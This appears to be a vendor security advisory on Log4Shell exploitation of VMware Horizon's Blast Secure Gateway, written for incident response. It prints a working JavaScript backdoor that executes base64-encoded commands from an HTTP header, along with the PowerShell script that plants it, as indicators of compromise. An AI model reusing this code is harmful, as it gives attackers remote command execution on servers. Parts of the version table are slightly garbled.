Advisory on log4Shell VMWare Horizon


Introduction

If you have VMWare Horizon in your organization, this message may be very important for you to secure your IT infrastructure. Your organization can be penetrated and hacked at any time.

We analyzed a successful exploitation of the “Log4shell” vulnerability CVE-2021-44228 on a VMWare Horizon component: Blast Secure Gateway.

This component, when enabled, allows clients to access remote desktops and applications from the Internet.

If you don’t have VMWare Horizon in your organization, you can ignore this advisory.

Here’s a table where you can verify if your VMWare Horizon is vulnerable to CVE-2021-44228 and CVE-2021-45046:

VersionVulnerability statusMitigation
2111    Build 19067837 (release date 12/16/2021) is not vulnerable.     Build 19052438 (release date 12/14/2021) is vulnerable to CVE-2021-45046 (only if the HTML Access portal is installed).     Build 18964782 (release date 11/30/2021) is vulnerable to both (only if the HTML Access portal is installed).Manual Mitigation for Horizon Connection Server Scripted Mitigation for Horizon Connection Server, Agent for Windows, HTML Access portal https://kb.vmware.com/s/article/87073#Manual_Mitigation_for_Horizon_Connection_Server    
2006, 2012, 2103, 2106Vulnerable (only if HTML Access portal is installed) and should be updated to 2111. -worker.js
7.13.1    Build 19069458 (release date 12/16/2021) is not vulnerable.     Build 18057992 (release date 5/25/2021) is vulnerable to both (only if the HTML Access portal is installed).
7.13.0Vulnerable (only if HTML Access portal is installed) and should be updated to 7.13.1. 
7.10.3    Build 19069415 (release date 12/17/2021) is not vulnerable.     Build 17056980 (release date 10/22/2020) is vulnerable to both (only if the HTML Access portal is installed). 
7.10.0 – 7.10.2Vulnerable (only if HTML Access portal is installed) and should be updated to 7.10.3 
7.4.0-7.9.0, 7.12.0, 7.11.0Vulnerable (only if HTML Access portal is installed) but are out of support and should be updated with a supported version. 

The investigation is still ongoing, but we already have evidence of malicious activities that you can look for in your systems.

Specifically, the actor installed a backdoor in a Javascript library that is part of the Blast Secure Gateway:

[root]\Program Files\VMWare\VMWare View\Server\appblastgateway\lib\absg-worker.js

The backdoor is waiting for a specific string in the HTTP request to decode a base64-encoded payload and possibly execute it under the “replyError” function:

Snippet 1

 if
(String(req.url).includes('lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb'))
{                
try {                    
replyError(req, res, 200,
require('child_process').execSync(
                        Buffer.from(req.headers['data'],
'base64').toString('ascii')
                    ).toString());
                }
                catch (err) {
                    replyError(req, res, 400, err.stderr.toString());
                }
                return;
            }

Backdoor insertion is performed through a Powershell script. This script is decoded from a malicious Java class downloaded and executed after successful exploitation of the CVE-2021-44228 (also known as log4shell):

Snippet 2

powershell -c $path=gwmi win32_service|?{$_.Name -like “*VMBlastSG*”}|%{$_.PathName -replace ‘”‘, ” -replace “nssm.exe”,”lib\absg-worker.js”};$expr=”req.connection.end();`r`n`t`t`t}`r`n`r`n`t`t`tif (String(req.url).includes(‘lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbb’)) {`r`n`t`t`t`ttry {`r`n`t`t`t`t`treplyError(req, res, 200, require(‘child_process’).execSync(`r`n`t`t`t`t`t`tBuffer.from(req.headers[‘data’], ‘base64’).toString(‘ascii’)`r`n`t`t`t`t`t).toString());`r`n`t`t`t`t}`r`n`t`t`t`tcatch (err) {`r`n`t`t`t`t`treplyError(req, res, 400, err.stderr.toString());`r`n`t`t`t`t}`r`n`t`t`t`treturn;”;(Get-Content $path)|ForEach-Object {$_ -replace “req.connection.end\(\)\;”, $expr}|Set-Content $path;Restart-Service -Force VMBlastSG

We have already performed extensive hunting on all available logs we receive from your organization and found no exploitation evidence, but we might not have full visibility.

Hence, here’s a list of potential IOCs (Indicator of Compromise) you can look for if you have VMWare Horizon – VMWare Blast Gateway:

IOCLocationDescription
lxmvvZ3S4o250Tw22Z9vTao0cJFmkplDoi828cVwQtZVj3eUbbReverse proxy logs, Powershell logsString “Id” for the backdoor activation
Snippet 1On the VMWare Horizon server machine [root]\Program Files\VMWare\VMWare View\Server\appblastgateway\lib\absg-worker.jsActual backdoor
Snippet 2On the VMWare Horizon Server machine  Powershell logs under Applications and Services Logs > PowerShellCore > OperationalEvidence of the malicious Java class being decoded

We have no evidence of the backdoor being used now, nor on the post-exploitation steps. Information on the threat actor seems to point towards gathering credentials available on the host using LSASS dumping techniques.

Don’t

  • Patch before verifying that the backdoor is present.
  • Revert the VM Horizon to a previous snapshot without making sure that you store the infected one for forensics.
  • Modify the machine once found infected.
  • Shutdown the machine before performing the snapshot or contacting us.

 

Do

  • Verify if you have VMWare Horizon
  • Verify its version, if not vulnerable any further action is required
  • If vulnerable, take a live snapshot of the machine before performing further actions
  • Once a snapshot of the powered-on machine has been taken, verify the backdoor presence
  • If no backdoor is present, proceed with the mitigation
  • If the backdoor is present, disconnect the machine from the network and contact us

Hacknowledge’s reaction

  • We have already performed extensive searches on all available logs
  • We are in contact with the Confederation CERT (GovCERT) to share IOCs and TTPs
  • We create this piece of advisory to inform proactively our clients

Sources

33